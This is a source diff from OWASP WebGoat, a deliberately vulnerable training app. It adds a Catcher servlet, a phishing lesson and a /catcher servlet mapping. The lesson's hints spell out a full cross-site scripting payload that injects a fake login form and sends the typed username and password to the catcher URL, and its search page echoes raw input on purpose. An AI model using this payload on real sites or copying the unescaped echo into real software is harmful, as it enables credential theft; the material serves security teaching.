diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
new file mode 100644
index 000000000..c23bd5152
--- /dev/null
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -0,0 +1,116 @@
+package org.owasp.webgoat;
+
+import java.io.IOException;
+import java.util.Enumeration;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+import org.owasp.webgoat.session.Course;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ *
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created March 13, 2007
+ */
+public class Catcher extends HammerHead
+{
+
+ /**
+ * Description of the Field
+ */
+ public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE";
+
+ public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE";
+
+ public static final String PROPERTY = "PROPERTY";
+
+ public static final String EMPTY_STRING = "";
+
+
+ /**
+ * Description of the Method
+ *
+ * @param request Description of the Parameter
+ * @param response Description of the Parameter
+ * @exception IOException Description of the Exception
+ * @exception ServletException Description of the Exception
+ */
+ public void doPost(HttpServletRequest request, HttpServletResponse response)
+ throws IOException, ServletException
+ {
+ try
+ {
+ //System.out.println( "Entering doPost: " );
+ //System.out.println( " - request " + request);
+ //System.out.println( " - principle: " + request.getUserPrincipal() );
+ //setCacheHeaders(response, 0);
+ WebSession session = (WebSession) request.getSession(true)
+ .getAttribute(WebSession.SESSION);
+ session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+
+ int scr = session.getCurrentScreen();
+ Course course = session.getCourse();
+ AbstractLesson lesson = course.getLesson(session, scr,
+ AbstractLesson.USER_ROLE);
+
+ log(request, lesson.getClass().getName() + " | "
+ + session.getParser().toString());
+
+ String property = new String(session.getParser().getStringParameter(
+ PROPERTY, EMPTY_STRING));
+
+ // if the PROPERTY parameter is available - write all the parameters to the
+ // property file. No other control parameters are supported at this time.
+ if ( !property.equals(EMPTY_STRING))
+ {
+ Enumeration e = session.getParser().getParameterNames();
+
+ while (e.hasMoreElements())
+ {
+ String name = (String) e.nextElement();
+ String value= session.getParser().getParameterValues(name)[0];
+ lesson.getLessonTracker(session).getLessonProperties().setProperty(
+ name, value);
+ }
+ }
+ lesson.getLessonTracker(session).store(session, lesson);
+
+ }
+ catch (Throwable t)
+ {
+ t.printStackTrace();
+ log("ERROR: " + t);
+ }
+ }
+}
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
index 9f8ff6470..79acbe650 100644
--- a/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/LessonSource.java
@@ -67,80 +67,50 @@ public class LessonSource extends HammerHead
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws IOException, ServletException
{
- String source = null;
-
- try
- {
- //System.out.println( "Entering doPost: " );
- //System.out.println( " - request " + request);
- //System.out.println( " - principle: " + request.getUserPrincipal() );
- //setCacheHeaders(response, 0);
- WebSession session = (WebSession) request.getSession(true)
- .getAttribute(WebSession.SESSION);
- session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
-
- // Get the Java source of the lesson. FIXME: Not needed
- source = getSource(session);
-
- int scr = session.getCurrentScreen();
- Course course = session.getCourse();
- AbstractLesson lesson = course.getLesson(session, scr,
- AbstractLesson.USER_ROLE);
- lesson.getLessonTracker(session).setViewedSource(true);
- }
- catch (Throwable t)
- {
- t.printStackTrace();
- log("ERROR: " + t);
- }
- finally
- {
- try
- {
- this.writeSource(source, response);
- }
- catch (Throwable thr)
- {
- thr.printStackTrace();
- log(request, "Could not write error screen: "
- + thr.getMessage());
- }
- //System.out.println( "Leaving doPost: " );
-
- }
+ String source = null;
+
+ try
+ {
+ //System.out.println( "Entering doPost: " );
+ //System.out.println( " - request " + request);
+ //System.out.println( " - principle: " + request.getUserPrincipal() );
+ //setCacheHeaders(response, 0);
+ WebSession session = (WebSession) request.getSession(true)
+ .getAttribute(WebSession.SESSION);
+ session.update(request, response, this.getServletName()); // FIXME: Too much in this call.
+
+ // Get the Java source of the lesson. FIXME: Not needed
+ source = getSource(session);
+
+ int scr = session.getCurrentScreen();
+ Course course = session.getCourse();
+ AbstractLesson lesson = course.getLesson(session, scr,
+ AbstractLesson.USER_ROLE);
+ lesson.getLessonTracker(session).setViewedSource(true);
+ }
+ catch (Throwable t)
+ {
+ t.printStackTrace();
+ log("ERROR: " + t);
+ }
+ finally
+ {
+ try
+ {
+ this.writeSource(source, response);
+ }
+ catch (Throwable thr)
+ {
+ thr.printStackTrace();
+ log(request, "Could not write error screen: "
+ + thr.getMessage());
+ }
+ //System.out.println( "Leaving doPost: " );
+
+ }
}
- protected WebSession updateSession_DELETEME(HttpServletRequest request,
- HttpServletResponse response, ServletContext context)
- {
- HttpSession hs;
- hs = request.getSession(true);
-
- //System.out.println( "Entering Session_id: " + hs.getId() );
- // dumpSession( hs );
-
- // Make a temporary session to avoid the concurreny issue
- // in WebSession
- WebSession session = new WebSession(this, context);
-
- WebSession realSession = null;
- Object o = hs.getAttribute(WebSession.SESSION);
-
- if ((o != null) && o instanceof WebSession)
- {
- realSession = (WebSession) o;
- }
- session.setCurrentScreen(realSession.getCurrentScreen());
- session.setCourse(realSession.getCourse());
- session.setRequest(request);
-
- // to authenticate
- //System.out.println( "Leaving Session_id: " + hs.getId() );
- //dumpSession( hs );
- return (session);
- }
-
/**
* Description of the Method
diff --git a/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
new file mode 100644
index 000000000..5077ddd0d
--- /dev/null
+++ b/ webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
@@ -0,0 +1,282 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Comment;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.HR;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.Catcher;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ *
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Bruce Mayhew WebGoat
+ * @created March 13, 2007
+ */
+public class Phishing extends LessonAdapter
+{
+
+ /**
+ * Description of the Field
+ */
+ protected final static String SEARCH = "Username";
+ private String searchText;
+
+
+ /**
+ * Description of the Method
+ *
+ * @param s Description of the Parameter
+ * @return Description of the Return Value
+ */
+ private boolean postedCredentials(WebSession s)
+ {
+ String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
+ .getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
+
+ //
+ return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
+ //
+ }
+
+
+ /**
+ * Description of the Method
+ *
+ * @param s Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ try
+ {
+ searchText = s.getParser().getRawParameter(SEARCH,"");
+ //
+ //
+
+ ec.addElement(makeSearch(s));
+ if (postedCredentials(s))
+ {
+ makeSuccess(s);
+ }
+ }
+ catch (Exception e)
+ {
+ s.setMessage("Error generating " + this.getClass().getName());
+ }
+
+ return (ec);
+ }
+
+
+ protected Element makeSearch(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ ec.addElement(new H1().addElement("WebGoat Search "));
+ Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+ .setAlign("center");
+
+ TR tr = new TR();
+ tr.addElement(new TD().addElement(" ").setColSpan(2));
+ t.addElement(tr);
+ if (s.isColor())
+ {
+ t.setBorder(1);
+ }
+
+ tr = new TR();
+ tr
+ .addElement(new TH()
+ .addElement(
+ "This facility will search the WebGoat source.")
+ .setColSpan(2).setAlign("center"));
+ t.addElement(tr);
+
+ tr = new TR();
+ tr.addElement(new TD().addElement(" ").setColSpan(2));
+ t.addElement(tr);
+
+ TR row1 = new TR();
+ row1.addElement(new TD(new B(new StringElement("Search: "))).setAlign("right"));
+
+ Input input1 = new Input(Input.TEXT, SEARCH, searchText);
+ row1.addElement(new TD(input1).setAlign("left"));
+ t.addElement(row1);
+
+ Element b = ECSFactory.makeButton("Search");
+ t.addElement(new TR(new TD(b).setColSpan(2)).setAlign("center"));
+ ec.addElement(t);
+
+ if (!searchText.equals(""))
+ {
+ ec.addElement(new BR());
+ ec.addElement(new HR());
+ ec.addElement(new BR());
+ ec.addElement(new StringElement("Results for: " + searchText));
+ ec.addElement(new Comment("Search results"));
+ ec.addElement(new BR());
+ ec.addElement(new BR());
+ ec.addElement(new B(new StringElement("No results were found.")));
+ ec.addElement(new Comment("End of Search results"));
+ }
+
+ return (ec);
+ }
+
+
+ /**
+ * Gets the hints attribute of the CluesScreen object
+ *
+ * @return The hints value
+ */
+ protected List getHints()
+ {
+ List hints = new ArrayList();
+ hints
+ .add("Try adding HTML to the search field to create a fake authentication form.
" +
+ "Try to make the form look official.");
+ hints.add("Try:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br></form><br><br><HR>");
+ hints.add("Add functionality that can post a request, a button might work
" +
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to:
" +
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
+ hints.add("Try:
" +
+ "<input type="submit" name="login" " +
+ "value="login">"+
+ "
Solution for this hint:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ hints.add("Make the button perform an action on submit,
" +
+ "adding an onclick=\"hack()\" might work
"+
+ "Don't forget to add the hack() javascript function" +
+ "
Solution for this hint:
" +
+ "password<form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ hints.add("You need to create the hack() function. This function will pull the credentials from the " +
+ "webpage and post them to the WebGoat catcher servlet.
" +
+ "
Some useful code snippets:" +
+ "- doucument.forms[0].user.value - will access the user field" +
+ "
- XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
+ "
- javascript string concatentation uses a \"+\"
" +
+ "
Solution for this hint():
" +
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." +
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " +
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" +
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" +
+ "</script>");
+ hints.add("Complete solution for this lesson:
" +
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen." +
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); " +
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+" +
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}" +
+ "</script><form><br><br><HR><H3>This feature requires account login:</H2" +
+ "><br><br>Enter Username:<br><input type="text" id="user" " +
+ "name="user"><br>Enter Password:<br><input type="password" " +
+ "name = "pass"><br><input type="submit" name="login" " +
+ "value="login" onclick="hack()"></form><br><br><HR>");
+ /**
+ * password
FeedbackAddress
- <A HREF=mailto:webgoat@g2-inc.com>webgoat@g2-inc.com</A>
+ <A HREF=mailto:WebGoat@g2-inc.com>WebGoat@g2-inc.com</A>
@@ -174,6 +174,14 @@
org.owasp.webgoat.LessonSource
+
+ CookieCatcher
+
+ This servlet catches any posts and marks the appropriate lesson property.
+
+ org.owasp.webgoat.CookieCatcher
+
+
conf
/lessons/ConfManagement/config.jsp
@@ -195,8 +203,7 @@
It is also legal to define more than one mapping for the same
servlet, if you wish to.
-->
-
-
+
AxisServlet
/servlet/AxisServlet
@@ -235,11 +242,16 @@
/source
+
+ CookieCatcher
+ /catcher
+
+
conf
/conf
-
+